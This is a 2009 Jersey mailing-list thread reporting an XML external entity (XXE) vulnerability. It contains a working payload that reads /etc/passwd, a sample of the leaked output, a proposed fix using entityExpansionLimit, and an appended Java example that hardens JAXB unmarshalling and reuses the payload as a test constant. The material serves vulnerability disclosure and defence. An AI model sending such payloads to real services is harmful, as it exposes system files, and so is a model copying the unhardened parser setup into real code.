Sorry, wrong file was attached. Here's the correct one.
On Tue, Jul 7, 2009 at 11:16 AM, Tim McCune <tim_at_mccune.name> wrote:
> Even simpler to demonstrate, I've simply patched the "jaxb" example from
> the jersey-samples project with a new test case that demonstrates the
> vulnerability. I'm attaching the diff so you can patch the sample project
> and see the result for yourself.
>
> Apply the patch, run "mvn install" on the jaxb example project, and examine
> the test failure in
> target/surefire-reports/com.sun.jersey.samples.jaxb.MainTest.txt. You'll
> see something like this (on a Unix system):
>
> Tests run: 9, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 9.058 sec
> <<< FAILURE!
> testXXEVulnerability(com.sun.jersey.samples.jaxb.MainTest) Time elapsed:
> 0.598 sec <<< FAILURE!
> java.lang.AssertionError: XXE Attack succeeded: <?xml version="1.0"
> encoding="UTF-8"
> standalone="yes"?><jaxbXmlRootElement><value>root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> ...
>
>
> On Mon, Jul 6, 2009 at 1:25 PM, Tim McCune <tim_at_mccune.name> wrote:
>
>> @Path("/")
>> public class MovieResource
>> ...
>> @POST
>> @Path("user/{id}/favoriteMovies")
>> @Consumes({"application/xml", "application/json"})
>> public FavoriteMovie addFavoriteMovie(@PathParam("id") Long id,
>> FavoriteMovie movie) {
>> return movie;
>> }
>> }
>>
>> @XmlRootElement
>> public class FavoriteMovie {
>> private String _title;
>> public String getTitle() {
>> return _title;
>> }
>> public void setTitle(String title) {
>> _title = title;
>> }
>> }
>>
>> If I POST the following XML:
>> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
>> <favoriteMovie><title>&xxe;</title></favoriteMovie>
>>
>> I get back:
>> <favoriteMovie>
>> <title>root:x:0:0:root:/root:/bin/bash
>> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
>> ...
>> </title>
>> </favoriteMovie>
>>
>> Adding a
>> System.setProperty("entityExpansionLimit", "0");
>> fixes the problem, and causes this exception instead:
>> org.xml.sax.SAXParseException: The parser has encountered more than "0"
>> entity expansions in this document; this is the limit imposed by the
>> application.
>>
>>
>> On Mon, Jul 6, 2009 at 1:01 PM, Guba, Nicolai <nguba_at_bioware.com> wrote:
>>
>>> I could not reproduce it. The JAXB serializer (correctly) identified
>>> this as an invalid request.
>>>
>>> Maybe it works with resources that are processing form parameters? It
>>> may be helpful to see the code snippet of the resource you are accessing.
>>>
>>> --
>>>
>>> =NPG=
>>>
>>> From: ksuwildcat_at_gmail.com [mailto:ksuwildcat_at_gmail.com] On Behalf Of Tim McCune
>>> Sent: Monday, July 06, 2009 1:04 PM
>>> To: users_at_jersey.dev.java.net
>>> Subject: [Jersey] Jersey vulnerable to XXE attack?
>>>
>>> http://www.securiteam.com/securitynews/6D0100A5PU.html
>>>
>>> Just tried this attack against a simple web service built on top of
>>> Jersey, and it seems to have succeeded.
>>>
>>> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
>>> <foo><bar>&xxe;</bar></foo>
>>>
>>> If I POST that to a web service built on Jersey, and have my resource
>>> just return the parameter that was passed into it, I can see the contents of
>>> /etc/passwd.
>>>
>>> Can anyone confirm that this vulnerability exists, and if so, advise on
>>> the best way to protect against it?
>>>
>>
>>
>
- application/octet-stream attachment: diff
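The thread above fixes the problem by setting the entityExpansionLimit system property. An alternative mitigation, shown here as an added example that is not code from the thread or from the Jersey project, is to hand JAXB a StAX reader that has DTD processing and external-entity resolution switched off, so a payload like the one posted fails to unmarshal instead of returning file contents. It assumes the javax.xml.bind API (JAXB 2.x as bundled with JDK 6) and the JDK's own StAX implementation; FavoriteMovie is modelled on the class in the thread, and the XxeSafeUnmarshal class, its method names and the PAYLOAD constant are invented for the example.

```java
import java.io.StringReader;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.Unmarshaller;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamReader;

public class XxeSafeUnmarshal {

    // Same shape as the FavoriteMovie bean posted in the thread.
    @XmlRootElement(name = "favoriteMovie")
    public static class FavoriteMovie {
        private String title;
        public String getTitle() { return title; }
        public void setTitle(String t) { title = t; }
    }

    // Constructed sample request of the kind shown in the thread (example data).
    static final String PAYLOAD =
        "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
      + "<favoriteMovie><title>&xxe;</title></favoriteMovie>";

    // Default behaviour: a plain Unmarshaller lets the underlying parser
    // resolve the external entity, which is what the thread observed.
    static FavoriteMovie unmarshalDefault(String xml) throws Exception {
        Unmarshaller u = JAXBContext.newInstance(FavoriteMovie.class).createUnmarshaller();
        return (FavoriteMovie) u.unmarshal(new StringReader(xml));
    }

    // Hardened: build an XMLStreamReader that refuses DTDs and external
    // entities, then let JAXB consume that reader instead of the raw input.
    static FavoriteMovie unmarshalHardened(String xml) throws Exception {
        XMLInputFactory xif = XMLInputFactory.newInstance();
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);
        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
        XMLStreamReader xsr = xif.createXMLStreamReader(new StringReader(xml));
        Unmarshaller u = JAXBContext.newInstance(FavoriteMovie.class).createUnmarshaller();
        return (FavoriteMovie) u.unmarshal(xsr);
    }

    public static void main(String[] args) throws Exception {
        try {
            FavoriteMovie m = unmarshalHardened(PAYLOAD);
            System.out.println("unexpected: hardened path returned title " + m.getTitle());
        } catch (Exception e) {
            // Expected: the DOCTYPE / undeclared entity is rejected by the StAX reader.
            System.out.println("hardened path rejected the request: " + e.getMessage());
        }
    }
}
```

In a Jersey resource this reader would have to be wired in through a custom MessageBodyReader for application/xml rather than relying on the default JAXB provider; that wiring is not shown here.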